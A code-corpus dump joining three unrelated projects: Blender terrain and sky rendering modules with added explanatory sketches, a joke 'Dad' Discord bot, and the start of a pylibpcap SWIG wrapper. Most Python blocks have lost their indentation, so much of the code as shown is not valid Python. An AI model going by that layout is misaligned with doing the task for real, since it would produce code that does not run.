_current_settings['AirDensity'] = self._get_random_number(params['AirDensity'])
self._sky_node.air_density = _current_settings['AirDensity']
################################################################################# end of set air density value #
# set dust desnity value #######################################################################################
_current_settings['DustDensity'] = self._get_random_number(params['DustDensity'])
self._sky_node.dust_density = _current_settings['DustDensity']
################################################################################ end of set dust desnity value #
# set ozone density value ######################################################################################
_current_settings['OzoneDensity'] = self._get_random_number(params['OzoneDensity'])
self._sky_node.ozone_density = _current_settings['OzoneDensity']
############################################################################### end of set ozone density value #
######################################################## end of generate values for sky node and apply to node #
# set keyframe if requested ####################################################################################
if keyframe > -1:
self._sky_node.keyframe_insert('sun_size', frame=keyframe)
self._sky_node.keyframe_insert('sun_intensity', frame=keyframe)
self._sky_node.keyframe_insert('sun_elevation', frame=keyframe)
self._sky_node.keyframe_insert('sun_rotation', frame=keyframe)
self._sky_node.keyframe_insert('altitude', frame=keyframe)
self._sky_node.keyframe_insert('air_density', frame=keyframe)
self._sky_node.keyframe_insert('dust_density', frame=keyframe)
self._sky_node.keyframe_insert('ozone_density', frame=keyframe)
# set interpolation to constant ############################################################################
_fcurves = self._world_node_tree.node_tree.animation_data.action.fcurves
for fcurve in _fcurves:
for kf in fcurve.keyframe_points:
kf.interpolation = 'CONSTANT'
##################################################################### end of set interpolation to constant #
############################################################################# end of set keyframe if requested #
# return chosen settings
return _current_settings
def create(self,last_element=None):
""" create function
Args:
last_element: current last element in node tree [blObject]
Returns:
return new last element [blObject]
"""
# add sky
return self._add_sky(last_element=last_element,node_offset=self._node_offset)
def step(self,keyframe):
""" step function
Args:
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
self._set_sky_parameters_NISHITA(params=self._cfg, keyframe=keyframe)
```
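_set_sky_parameters_NISHITA expects each parameter as a one- or two-element list: a fixed value, or a [min, max] range sampled uniformly per frame. The sketch below shows such a configuration; only the keys are taken from the code above, the values are examples.

```python
# Illustrative NISHITA sky parameters; keys come from _set_sky_parameters_NISHITA
# above, values are examples. Angular values are given in degrees.
sky_params = {
    "SunSize": [0.5, 3.0],
    "SunIntensity": [0.5, 1.0],
    "SunElevation": [10.0, 80.0],
    "SunRotation": [0.0, 360.0],
    "SunAltitude": [0.0, 1000.0],
    "AirDensity": [1.0, 2.0],
    "DustDensity": [0.0, 5.0],
    "OzoneDensity": [1.0, 3.0],
}
```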
#### File: src/environment_effects/TSSEnvironmentEffects.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
# TSS specific imports
from src.TSSBase import TSSBase
from src.tools.NodeTools import NodeTools
class TSSEnvironmentEffects(TSSBase,NodeTools):
"""docstring for TSSEnvironmentEffects
base class for Environment Effects
"""
def __init__(self):
super(TSSEnvironmentEffects, self).__init__()
# class vars ###################################################################################################
self._world_node_tree = None # world node tree [blObject]
self._render_layers_node = None # render passes node in compositor [blObject]
self._node_offset = [0,0] # node offsets for nodes in compositor [blObject]
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
DO NOT OVERWRITE!
Args:
None
Returns:
None
"""
# call internal reset functions ################################################################################
self.reset()
self.reset_base()
######################################################################### end of call internal reset functions #
# reset base class vars ########################################################################################
self._world_node_tree = None
self._render_layers_node = None
self._node_offset = [0,0]
################################################################################# end of reset base class vars #
def reset(self):
""" specific reset function
OVERWRITE!
Args:
None
Returns:
None
"""
pass
def set_world_node_tree(self,world_node_tree):
""" set world node tree
DO NOT OVERWRITE!
Args:
world_node_tree: world node tree [blObject]
Returns:
None
"""
self._world_node_tree = world_node_tree
def set_render_layers_node(self,render_layers_node):
""" set main render passes node
DO NOT OVERWRITE!
Args:
render_layers_node: render layer node [blObject]
Returns:
None
"""
self._render_layers_node = render_layers_node
def set_node_offset(self,node_offset):
""" set node offset
DO NOT OVERWRITE!
Args:
node_offset: node offset [x,y]
Returns:
None
"""
self._node_offset = node_offset
def _print_msg(self,skk): print("\033[94m {}\033[00m" .format(skk))
def create(self):
""" create function
OVERWRITE!
Args:
None
Returns:
None
"""
pass
def step(self):
""" step function
OVERWRITE!
Args:
None
Returns:
None
"""
pass
```
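EnvLightBlenderSky above is one concrete implementation of this interface; any other effect only needs to overwrite reset(), create() and step(). A bare skeleton sketch (class name illustrative):

```python
# Bare skeleton of a custom environment effect; the class name is illustrative.
from src.environment_effects.TSSEnvironmentEffects import TSSEnvironmentEffects

class EnvConstantBackground(TSSEnvironmentEffects):
    """docstring for EnvConstantBackground"""
    def reset(self):
        pass

    def create(self, last_element=None):
        # build nodes in self._world_node_tree here, starting at self._node_offset,
        # and return the new last output socket
        return last_element

    def step(self, keyframe):
        pass
```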
#### File: src/handle/TSSRenderHandle.py
```python
import bpy
# utility imports
import numpy as np
# system imports
import sys
import os
import pathlib
import importlib
from datetime import datetime
class TSSRenderHandle(object):
"""docstring for TSSRenderHandle"""
def __init__(self):
super(TSSRenderHandle, self).__init__()
# class vars ###################################################################################################
self._pass_list = []
self._cfg = {}
self._outputPath = ""
self._global_step_index = 1
self._compositor_pass_list = {}
############################################################################################ end of class vars #
def reset_module(self):
# reset all render_pass ########################################################################################
for render_pass in self._pass_list:
# reset render_pass
render_pass.reset_module()
# maybe obsolete in future versions
del render_pass
################################################################################# end of reset all render_pass #
self._compositor_pass_list = {}
self._pass_list = []
def _create_passes(self,cfg,general_cfg,node_tree):
for ii, render_pass in enumerate(cfg):
try:
# import module and create class #######################################################################
_module_name = "src.rendering.passes." + render_pass["type"]
_module = importlib.import_module(_module_name)
_class = getattr(_module, render_pass["type"])
_render_pass = _class(pass_name=render_pass["type"])
################################################################ end of import module and create class #
# set pass params and create pass ######################################################################
general_cfg["outputPath"] = self._outputPath
# set general cfg
_render_pass.set_general_cfg(cfg=general_cfg)
# update sensor cfg
_render_pass.update_cfg(cfg=render_pass["passParams"])
# set node offset for organized node tree
_render_pass.set_node_offset(node_offset=[1000,2000*ii])
# set node tree handle
_render_pass.set_node_tree(node_tree=node_tree)
# set global step index
_render_pass.set_global_step_index(index = self._global_step_index)
# set compositor_pass_list
_render_pass.set_compositor_pass_list(compositor_pass_list = self._compositor_pass_list)
# create pass
_render_pass.create()
############################################################### end of set pass params and create pass #
# add pass to list
self._pass_list.append(_render_pass)
except ImportError:
# manage import error
raise Exception("Cannot add render pass")
return -1
return 0
def get_render_pass_list(self):
return self._pass_list
def update_cfg(self,cfg):
""" set cfg dict for object
DO NOT OVERWRITE!
Args:
cfg: cfg dict of class [dict]
Returns:
None
"""
self._cfg = cfg
def _set_render_settings(self,renderCfg):
# setup render engine
bpy.context.scene.render.engine = renderCfg['renderEngine']
bpy.context.scene.cycles.feature_set = renderCfg['renderFeatureSet']
if renderCfg['renderDevice'] == 'GPU':
bpy.context.preferences.addons["cycles"].preferences.compute_device_type = "CUDA"
bpy.context.preferences.addons["cycles"].preferences.get_devices()
bpy.context.scene.cycles.device = renderCfg['renderDevice'] # this is just for the GUI mode
bpy.data.scenes["Scene"].cycles.device= renderCfg['renderDevice'] # this is for cmd mode
# create output folder
# TODO: shift this to button "render scene"
# performance settings
bpy.context.scene.render.tile_x = renderCfg['performanceTilesX']
bpy.context.scene.render.tile_y = renderCfg['performanceTilesY']
# activate renderChannels ###############################################################
# deactive by default all render channels
bpy.context.scene.view_layers["View Layer"].use_pass_combined = False
bpy.context.scene.view_layers["View Layer"].use_pass_z = True
bpy.context.scene.view_layers["View Layer"].use_pass_mist = False
bpy.context.scene.view_layers["View Layer"].use_pass_normal = False
bpy.context.scene.view_layers["View Layer"].use_pass_vector = False
bpy.context.scene.view_layers["View Layer"].use_pass_uv = False
bpy.context.scene.view_layers["View Layer"].use_pass_object_index = False
bpy.context.scene.view_layers["View Layer"].use_pass_material_index = False
bpy.context.scene.view_layers["View Layer"].use_pass_diffuse_color = True
def set_compositor_pass_list(self,compositor_pass_list):
self._compositor_pass_list = compositor_pass_list
def set_output_folder(self,output_folder_path):
self._outputPath = output_folder_path
def create(self):
# set basic parameter ##########################################################################################
# bpy.context.scene.frame_end = numberFrames TODO what about that?
bpy.context.scene.render.image_settings.color_mode = 'RGB'
bpy.context.scene.render.film_transparent = False # TODO: should be an option in cfg
################################################################################### end of set basic parameter #
self._set_render_settings(renderCfg=self._cfg["GENERAL"])
# setup compositor #############################################################################################
#bpy.context.scene.use_nodes = True
_tree = bpy.context.scene.node_tree
# create input image node
if not "CompositorNodeRLayers" in self._compositor_pass_list:
_render_layers_node = _tree.nodes.new(type='CompositorNodeRLayers')
_render_layers_node.name = 'TSSCompositorNodeRLayers'
self._compositor_pass_list["CompositorNodeRLayers"] = _render_layers_node
###################################################################################### end of setup compositor #
# load render pass objects #####################################################################################
self._create_passes(cfg=self._cfg["RENDER_PASSES"],
general_cfg=self._cfg["GENERAL"],
node_tree=_tree)
############################################################################## end of load render pass objects #
def step(self, keyframe=-1):
self._global_step_index += 1
for render_pass in self._pass_list:
render_pass.increase_global_step_index()
def activate_pass(self, pass_name, pass_cfg, keyframe = -1):
pass
def deactivate_pass(self, pass_name, pass_cfg, keyframe = -1):
pass
```
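_set_render_settings reads its values from the GENERAL block of the render configuration. The sketch below shows such a block with example values; only the keys are taken from the code above.

```python
# Example GENERAL render settings; keys match _set_render_settings above,
# values are illustrative.
general_render_cfg = {
    "renderEngine": "CYCLES",
    "renderFeatureSet": "SUPPORTED",
    "renderDevice": "GPU",
    "performanceTilesX": 256,
    "performanceTilesY": 256,
}
```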
#### File: src/tools/cfg_parser.py
```python
import bpy
# system imports
import json
import copy as cp
class CCfgParser():
def __init__(self):
super(CCfgParser, self).__init__()
self.simulationSetupDict = None
self.renderSetupDict = None
self.postEffectsSetupDict = None
self.cameraDict = None
self.lightSetupDict = None
self.assetsDict = None
self.jsonDict = None
self.envDict = None
def readInCfg(self, cfgPath):
with open(cfgPath, 'r') as f:
# load json file
self.jsonDict = json.load(f)
# read in dicts for specific setups
self.simulationSetupDict = self.jsonDict['SIMULATION_SETUP']
self.renderSetupDict = self.jsonDict['RENDER_SETUP']
self.postEffectsSetupDict = self.jsonDict['RENDER_POST_PROCESSING_EFFECTS_SETUP']
#self.cameraDict = self.jsonDict['cameraSetup']
#self.lightSetupDict = self.jsonDict['lightSetup']
self.assetsDict = self.jsonDict['ASSET_SETUP']
self.envDict = self.jsonDict['ENVIRONMENT_EFFECTS_SETUP']
self.sensorDict = self.jsonDict['SENSOR_SETUP']
# go through terrain cfg and replace template cfg by cfg
#self.loadTemplateForAssets()
def loadTemplateForAssets(self):
for terrainSample in self.assetsDict["terrains"]:
self.loadTemplate(terrainSample)
def loadTemplate(self, cfg):
if "templatePath" in cfg:
with open(cfg["templatePath"], 'r') as templateFile:
_overwriteDict = cp.deepcopy(cfg)
_templateDict = json.load(templateFile)
# load template keys
for templateSample in _templateDict:
cfg[templateSample] = _templateDict[templateSample]
# load overwrite keys
for overwriteSample in _overwriteDict:
cfg[overwriteSample] = _overwriteDict[overwriteSample]
def getSimulationSetupCFG(self):
return self.simulationSetupDict
def getEnvSetupCFG(self):
return self.envDict
def getRenderSetupCFG(self):
return self.renderSetupDict
def getPostEffectSetupCFG(self):
return self.postEffectsSetupDict
def getSensorSetupCFG(self):
return self.sensorDict
def getLightSetupCFG(self):
return self.lightSetupDict
def getAssetsCFG(self):
return self.assetsDict
```
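A minimal usage sketch of the parser; the config path is illustrative.

```python
# Minimal usage sketch; the path is illustrative.
parser = CCfgParser()
parser.readInCfg("cfg/example_pipeline.json")

render_cfg = parser.getRenderSetupCFG()
asset_cfg = parser.getAssetsCFG()
sensor_cfg = parser.getSensorSetupCFG()
```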
#### File: src/tools/depth_dummy.py
```python
bl_info = {
"name": "distance_to_depth",
"author": "<NAME>",
"version": (1, 0, 0),
"blender": (2, 80, 0),
"location": "Compositor",
"description": "Provides a compositor node to convert distance images to depth images",
"category": "Compositor",
}
import bpy
from nodeitems_utils import NodeItem, register_node_categories, unregister_node_categories
from nodeitems_builtins import CompositorNodeCategory
# Build intrinsic camera parameters from Blender camera data
#
# See notes on this in
# blender.stackexchange.com/questions/15102/what-is-blenders-camera-projection-matrix-model
def get_camera_intrinsics():
scene = bpy.context.scene
camera = scene.camera.data
f_in_mm = camera.lens
resolution_x_in_px = scene.render.resolution_x
resolution_y_in_px = scene.render.resolution_y
scale = scene.render.resolution_percentage / 100
sensor_width_in_mm = camera.sensor_width
sensor_height_in_mm = camera.sensor_height
pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
if (camera.sensor_fit == 'VERTICAL'):
        # the sensor height is fixed (sensor fit is vertical),
# the sensor width is effectively changed with the pixel aspect ratio
s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
s_v = resolution_y_in_px * scale / sensor_height_in_mm
else: # 'HORIZONTAL' and 'AUTO'
# the sensor width is fixed (sensor fit is horizontal),
# the sensor height is effectively changed with the pixel aspect ratio
pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
s_u = resolution_x_in_px * scale / sensor_width_in_mm
s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm
# Parameters of intrinsic calibration matrix
f_u = f_in_mm * s_u
f_v = f_in_mm * s_v
c_u = resolution_x_in_px * scale / 2
c_v = resolution_y_in_px * scale / 2
return resolution_x_in_px * scale, resolution_y_in_px * scale, f_u, f_v, c_u, c_v
class DistanceToDepth (bpy.types.CompositorNodeCustomGroup):
"""
Corrects blender depth maps (that are actually distance maps)
    Calculates depth = dist / sqrt(1 + (x^2/fx^2) + (y^2/fy^2))
"""
bl_name = 'DistanceToDepth'
bl_label = 'Distance to Depth'
def update_defaults(self):
for node in self.node_tree.nodes:
if node.label == 'x':
node.inputs[1].default_value = self.width
elif node.label == 'y':
node.inputs[1].default_value = self.height
elif node.label == 'x_to_cam':
node.inputs[1].default_value = self.c_x
elif node.label == 'y_to_cam':
node.inputs[1].default_value = self.c_y
elif node.label == 'x_over_f':
node.inputs[1].default_value = self.f_x * self.f_x
elif node.label == 'y_over_f':
node.inputs[1].default_value = self.f_y * self.f_y
def update_intrinsics(self, context):
self.update_defaults()
def set_intrinsics_from_blender(self, context):
self.width, self.height, self.f_x, self.f_y, self.c_x, self.c_y = get_camera_intrinsics()
self.update_defaults()
def read_update_from_blender(self):
return False
def write_update_from_blender(self, value):
pass
width: bpy.props.FloatProperty(
name="width", description="image width", update=update_intrinsics)
height: bpy.props.FloatProperty(
name="height", description="image height", update=update_intrinsics)
f_x: bpy.props.FloatProperty(
name="f_x", description="x focal length", update=update_intrinsics)
f_y: bpy.props.FloatProperty(
name="f_y", description="y focal length", update=update_intrinsics)
c_x: bpy.props.FloatProperty(
name="c_x", description="princial point x", update=update_intrinsics)
c_y: bpy.props.FloatProperty(
name="c_y", description="princial point y", update=update_intrinsics)
update_from_blender: bpy.props.BoolProperty(name="update_from_blender",
description="Read the parameters from Blender", update=set_intrinsics_from_blender,
set=write_update_from_blender, get=read_update_from_blender)
def draw_buttons(self, context, layout):
row = layout.row()
row.prop(self, 'width', text='width')
row = layout.row()
row.prop(self, 'height', text='height')
row = layout.row()
row.prop(self, 'f_x', text='f_x')
row = layout.row()
row.prop(self, 'f_y', text='f_y')
row = layout.row()
row.prop(self, 'c_x', text='c_x')
row = layout.row()
row.prop(self, 'c_y', text='c_y')
row = layout.row()
row.prop(self, 'update_from_blender', text='get from blender')
def init(self, context):
self.node_tree = bpy.data.node_groups.new(
self.bl_name, 'CompositorNodeTree')
group_inputs = self.node_tree.nodes.new('NodeGroupInput')
group_outputs = self.node_tree.nodes.new('NodeGroupOutput')
self.node_tree.inputs.new('NodeSocketFloat', 'Distance')
self.node_tree.outputs.new('NodeSocketFloat', 'Depth')
# init position texture
# Blender compositor has no default way to get the coordinates of the currently processed pixel.
        # But one can create a texture that holds the x and y coordinates in its R and G channels, respectively.
tex = bpy.data.textures.new(name="Position", type="NONE")
tex.use_nodes = True
tex.node_tree.nodes.clear()
coordinates = tex.node_tree.nodes.new("TextureNodeCoordinates")
output = tex.node_tree.nodes.new("TextureNodeOutput")
tex.node_tree.links.new(coordinates.outputs[0], output.inputs['Color'])
texture_node = self.node_tree.nodes.new('CompositorNodeTexture')
texture_node.texture = tex
sep_rgba = self.node_tree.nodes.new('CompositorNodeSepRGBA')
self.node_tree.links.new(texture_node.outputs[1], sep_rgba.inputs[0])
# convert image coordinates to camera coordinates
x = self.node_tree.nodes.new('CompositorNodeMath')
x.label = "x"
x.operation = 'MULTIPLY'
self.node_tree.links.new(sep_rgba.outputs['R'], x.inputs[0])
x.inputs[1].default_value = self.width
y = self.node_tree.nodes.new('CompositorNodeMath')
y.label = "y"
y.operation = 'MULTIPLY'
self.node_tree.links.new(sep_rgba.outputs['G'], y.inputs[0])
y.inputs[1].default_value = self.height
x_to_cam = self.node_tree.nodes.new('CompositorNodeMath')
x_to_cam.label = "x_to_cam"
x_to_cam.operation = 'SUBTRACT'
self.node_tree.links.new(x.outputs[0], x_to_cam.inputs[0])
x_to_cam.inputs[1].default_value = self.c_x
y_to_cam = self.node_tree.nodes.new('CompositorNodeMath')
y_to_cam.label = "y_to_cam"
y_to_cam.operation = 'SUBTRACT'
self.node_tree.links.new(y.outputs[0], y_to_cam.inputs[0])
y_to_cam.inputs[1].default_value = self.c_y
# calculate 1 + (x^2/fx^2) + (y^2/fy^2)
sqr_x = self.node_tree.nodes.new('CompositorNodeMath')
sqr_x.operation = 'MULTIPLY'
self.node_tree.links.new(x_to_cam.outputs[0], sqr_x.inputs[0])
self.node_tree.links.new(x_to_cam.outputs[0], sqr_x.inputs[1])
sqr_y = self.node_tree.nodes.new('CompositorNodeMath')
sqr_y.operation = 'MULTIPLY'
self.node_tree.links.new(y_to_cam.outputs[0], sqr_y.inputs[0])
self.node_tree.links.new(y_to_cam.outputs[0], sqr_y.inputs[1])
x_over_f = self.node_tree.nodes.new('CompositorNodeMath')
x_over_f.label = "x_over_f"
x_over_f.operation = 'DIVIDE'
self.node_tree.links.new(sqr_x.outputs[0], x_over_f.inputs[0])
x_over_f.inputs[1].default_value = self.f_x * self.f_x
y_over_f = self.node_tree.nodes.new('CompositorNodeMath')
y_over_f.label = "y_over_f"
y_over_f.operation = 'DIVIDE'
self.node_tree.links.new(sqr_y.outputs[0], y_over_f.inputs[0])
y_over_f.inputs[1].default_value = self.f_y * self.f_y
one_plus_x = self.node_tree.nodes.new('CompositorNodeMath')
one_plus_x.operation = 'ADD'
one_plus_x.inputs[0].default_value = 1.0
self.node_tree.links.new(x_over_f.outputs[0], one_plus_x.inputs[1])
one_plus_x_plus_y = self.node_tree.nodes.new('CompositorNodeMath')
one_plus_x_plus_y.operation = 'ADD'
self.node_tree.links.new(
one_plus_x.outputs[0], one_plus_x_plus_y.inputs[0])
self.node_tree.links.new(y_over_f.outputs[0], one_plus_x_plus_y.inputs[1])
sqrt = self.node_tree.nodes.new('CompositorNodeMath')
sqrt.operation = 'SQRT'
self.node_tree.links.new(one_plus_x_plus_y.outputs[0], sqrt.inputs[0])
        # calculate final result: depth = distance / sqrt(1 + (x^2/fx^2) + (y^2/fy^2))
        dist_over_ellipse = self.node_tree.nodes.new('CompositorNodeMath')
        dist_over_ellipse.operation = 'DIVIDE'
        self.node_tree.links.new(
            group_inputs.outputs['Distance'], dist_over_ellipse.inputs[0])
        # divide the input distance by the square-root term computed above
        self.node_tree.links.new(
            sqrt.outputs[0], dist_over_ellipse.inputs[1])
        self.node_tree.links.new(
            dist_over_ellipse.outputs[0], group_outputs.inputs['Depth'])
def copy(self, node):
self.node_tree = node.node_tree.copy()
self.sep_rgba = node.sep_rgba
self.group_inputs = node.group_inputs
def free(self):
bpy.data.node_groups.remove(self.node_tree, do_unlink=True)
def register():
bpy.utils.register_class(DistanceToDepth)
newcatlist = [CompositorNodeCategory("CN_CV", "Computer Vision", items=[
NodeItem("DistanceToDepth")])]
register_node_categories("COMPUTER_VISION", newcatlist)
def unregister():
try:
unregister_node_categories("COMPUTER_VISION")
bpy.utils.unregister_class(DistanceToDepth)
except:
pass
```
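For reference, the node group built in `init` evaluates depth = distance / sqrt(1 + (x-c_x)^2/f_x^2 + (y-c_y)^2/f_y^2) per pixel; a NumPy sketch of the same conversion (array shape and intrinsics are assumptions) looks like this:
```python
import numpy as np

def distance_to_depth(dist, f_x, f_y, c_x, c_y):
    """Convert an HxW Euclidean distance map to a planar depth map.
    Intrinsics are given in pixels; values here are purely illustrative."""
    h, w = dist.shape
    xx, yy = np.meshgrid(np.arange(w) - c_x, np.arange(h) - c_y)
    return dist / np.sqrt(1.0 + (xx / f_x) ** 2 + (yy / f_y) ** 2)
```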
#### File: src/tools/distance2Depth.py
```python
import numpy as np
class CDistance2Depth(object):
"""docstring for CDistance2Depth"""
def __init__(self, arg):
super(CDistance2Depth, self).__init__()
self.arg = arg
# focal length
self._f_px = np.zeros((2)) # f_x and f_y [px]
self._f_mm = np.zeros((2)) # f_x and f_y [mm]
# central point
self._c_px = np.zeros((2)) # c_x and c_y [px]
self._c_mm = np.zeros((2)) # c_x and c_y [mm]
# baseline
self._b_px = 0.0 # baseline [px]
        self._b_mm = 0.0 # baseline [mm]
def setupNodes(self):
pass
def setCameraParameters(self,params):
pass
def getDepthFromDistance(self, distanceImage):
pass
def getDisparityFromDistance(self, distanceImage):
pass
```
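The class above is still a stub; one possible way to fill in `getDisparityFromDistance` (an assumption, not the author's implementation) is the usual pinhole-stereo relation disparity = f_x * baseline / depth:
```python
import numpy as np

# Illustrative sketch only: f_px is the focal length in pixels, baseline the
# stereo baseline; depth_image is an HxW NumPy array.
def disparity_from_depth(depth_image, f_px, baseline):
    depth = np.clip(depth_image, 1e-6, None)   # guard against division by zero
    return f_px * baseline / depth
```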
#### File: src/tools/timing_module.py
```python
import time
import TerrainStageSimulator.src.color_print as TCpr
#from tabulate import tabulate
####################################################################
# timingDict:
# timingDict['[self._className]_[name]'] = {minTime, maxTime, average, numSamples, accumulatedTime, newTic, ticTime}
####################################################################
class CTimingModule():
"""docstring for CTimingModule"""
def __init__(self):
super(CTimingModule, self).__init__()
def _initTiming(self,name):
self._className = name
self._timingDict = {}
self._timingTables = []
def _tic(self,name):
# get current time
now = time.time()
# build up name of key
keyName = self._className + '_' + name
# check if entry of key already exist
if keyName in self._timingDict.keys():
self._timingDict[keyName]['newTic'] = True
self._timingDict[keyName]['ticTime'] = now
else:
# new entry
self._timingSample = {}
self._timingSample['numSamples'] = 0
self._timingSample['newTic'] = True
self._timingSample['ticTime'] = now
self._timingDict[keyName] = self._timingSample
def _toc(self,name):
# get current time
now = time.time()
# build up name of key
keyName = self._className + '_' + name
# check if entry of key already exist
if keyName in self._timingDict.keys():
# check of tic was called before toc
if self._timingDict[keyName]['newTic']:
# calc delta time
deltaTime = now - self._timingDict[keyName]['ticTime']
# min time ####################################################
if 'minTime' in self._timingDict[keyName].keys():
if deltaTime < self._timingDict[keyName]['minTime']:
self._timingDict[keyName]['minTime'] = deltaTime
else:
self._timingDict[keyName]['minTime'] = deltaTime
#############################################################
# max time ####################################################
if 'maxTime' in self._timingDict[keyName].keys():
if deltaTime > self._timingDict[keyName]['maxTime']:
self._timingDict[keyName]['maxTime'] = deltaTime
else:
self._timingDict[keyName]['maxTime'] = deltaTime
#############################################################
# average time ####################################################
self._timingDict[keyName]['numSamples'] += 1
if 'average' in self._timingDict[keyName].keys():
                    self._timingDict[keyName]['accumulatedTime'] += deltaTime
                    self._timingDict[keyName]['average'] = self._timingDict[keyName]['accumulatedTime']/self._timingDict[keyName]['numSamples']
else:
self._timingDict[keyName]['average'] = deltaTime
                    self._timingDict[keyName]['accumulatedTime'] = deltaTime
#############################################################
# clean up ##################
self._timingDict[keyName]['newTic'] = False
self._timingDict[keyName]['ticTime'] = -1
##################
else:
print('ERROR: call tic before toc!')
else:
print('ERROR: call tic before toc!')
def get_timing(self):
return self._timingDict
def _add_new_timing_table(self,newTimingTable):
self._timingTables.append(newTimingTable)
def _print_timing_tables(self):
# add own timing table
self._timingTables.append(self._timingDict)
# header for tables
timingHeaders=['timingAgent', 'avgTime[sec]', 'minTime[sec]', 'maxTime[sec]', 'numSamples']
# go through timing tables and print timing information
        TCpr.prOrange('##### Timing Tables ####################################################################\n')
for tableEntry in self._timingTables:
# go through timing agents of entry of timing table
tableRows = []
for key in tableEntry:
print("key: ", key)
print("tableEntry[key]['average']: ", tableEntry[key]['average'])
print("tableEntry[key]['minTime']: ", tableEntry[key]['minTime'])
print("tableEntry[key]['maxTime']: ", tableEntry[key]['maxTime'])
print("tableEntry[key]['numSamples']: ", tableEntry[key]['numSamples'])
#tableSingleRow = [key ,tableEntry[key]['average'], tableEntry[key]['minTime'], tableEntry[key]['maxTime'], tableEntry[key]['numSamples']]
#tableRows.append(tableSingleRow)
# print table
#TCpr.prOrange(tabulate(tableRows,headers=timingHeaders))
TCpr.prOrange('##########################################################################################\n')
``` |
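A short sketch of how a class would mix in `CTimingModule` (class and agent names are illustrative):
```python
class CRenderStage(CTimingModule):
    def __init__(self):
        super(CRenderStage, self).__init__()
        self._initTiming("CRenderStage")

    def render(self):
        self._tic("render")
        # ... the actual work being timed ...
        self._toc("render")

stage = CRenderStage()
stage.render()
stage._print_timing_tables()   # prints min/max/average per timing agent
```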
{
"source": "5U55/DadBot",
"score": 3
} |
#### File: 5U55/DadBot/main.py
```python
import discord, os, random
from keep_alive import keep_alive
client = discord.Client()
reprimands = ['Language ', 'We don\'t use that language in this household ', 'Watch your mouth ', 'Hey, watch your language ']
@client.event
async def on_ready():
print('we have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
if 'i am ' in message.content.lower():
await message.channel.send('Hi '+message.content[message.content.lower().index('i am ')+5:len(message.content)]+' I\'m Dad')
if 'i\'m ' in message.content.lower():
await message.channel.send('Hi '+message.content[message.content.lower().index('i\'m ')+4:len(message.content)]+' I\'m Dad')
if 'im ' in message.content.lower():
if message.content.lower().index('im ') == 0 or message.content[message.content.lower().index('im ')-1] == ' ':
await message.channel.send('Hi '+message.content[message.content.lower().index('im ')+3:len(message.content)]+' I\'m Dad')
    if message.content.lower() in ('hell', 'heck', 'damn', 'shoot'):
        await message.channel.send(random.choice(reprimands)+'{}'.format(message.author.display_name))
if 'dad bot' in message.content.lower():
await message.channel.send('Yes, {} , you said my name?'.format(message.author.display_name))
if 'dad' in message.content.lower():
await message.channel.send('Yes, {} , you said my name?'.format(message.author.display_name))
if 'what\'s up' in message.content.lower():
await message.channel.send('The sky ;)')
if 'whats up' in message.content.lower():
await message.channel.send('The sky ;)')
if 'wassup' in message.content.lower():
await message.channel.send('The sky ;)')
keep_alive()
client.run(os.getenv('TOKEN'))
``` |
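The `keep_alive` module is imported but not shown here; on Repl.it-style hosting it is usually a tiny Flask server that an uptime monitor pings. A sketch of what such a module might look like (an assumption, not the repository's actual file):
```python
# keep_alive.py -- illustrative sketch, not the original module
from threading import Thread
from flask import Flask

app = Flask(__name__)

@app.route('/')
def home():
    return "I'm alive"

def keep_alive():
    # Run the web server in a background thread so client.run() can block.
    Thread(target=lambda: app.run(host='0.0.0.0', port=8080)).start()
```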
{
"source": "5u623l20/pylibpcap",
"score": 2
} |
#### File: 5u623l20/pylibpcap/pcap.py
```python
import _pcap
def _swig_setattr(self,class_type,name,value):
if (name == "this"):
if isinstance(value, class_type):
self.__dict__[name] = value.this
if hasattr(value,"thisown"): self.__dict__["thisown"] = value.thisown
del value.thisown
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
self.__dict__[name] = value
def _swig_getattr(self,class_type,name):
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
__doc__ = _pcap.__doc__
for dltname, dltvalue in _pcap.DLT.items():
globals()[dltname] = dltvalue
class pcapObject(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, pcapObject, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, pcapObject, name)
def __repr__(self):
return "<C pcapObject instance at %s>" % (self.this,)
def __init__(self, *args):
_swig_setattr(self, pcapObject, 'this', _pcap.new_pcapObject(*args))
_swig_setattr(self, pcapObject, 'thisown', 1)
import sys
if sys.version[0]=='2':
self.datalink.im_func.__doc__ = _pcap.pcapObject_datalink.__doc__
self.fileno.im_func.__doc__ = _pcap.pcapObject_fileno.__doc__
self.datalinks.im_func.__doc__ = _pcap.pcapObject_datalinks.__doc__
self.major_version.im_func.__doc__ = _pcap.pcapObject_major_version.__doc__
self.minor_version.im_func.__doc__ = _pcap.pcapObject_minor_version.__doc__
self.stats.im_func.__doc__ = _pcap.pcapObject_stats.__doc__
self.getnonblock.im_func.__doc__ = _pcap.pcapObject_getnonblock.__doc__
self.open_live.im_func.__doc__ = _pcap.pcapObject_open_live.__doc__
self.dispatch.im_func.__doc__ = _pcap.pcapObject_dispatch.__doc__
self.setnonblock.im_func.__doc__ = _pcap.pcapObject_setnonblock.__doc__
self.is_swapped.im_func.__doc__ = _pcap.pcapObject_is_swapped.__doc__
self.open_dead.im_func.__doc__ = _pcap.pcapObject_open_dead.__doc__
self.dump_open.im_func.__doc__ = _pcap.pcapObject_dump_open.__doc__
self.next.im_func.__doc__ = _pcap.pcapObject_next.__doc__
self.open_offline.im_func.__doc__ = _pcap.pcapObject_open_offline.__doc__
self.snapshot.im_func.__doc__ = _pcap.pcapObject_snapshot.__doc__
self.loop.im_func.__doc__ = _pcap.pcapObject_loop.__doc__
self.setfilter.im_func.__doc__ = _pcap.pcapObject_setfilter.__doc__
def __del__(self, destroy=_pcap.delete_pcapObject):
try:
if self.thisown: destroy(self)
except: pass
def open_live(*args): return _pcap.pcapObject_open_live(*args)
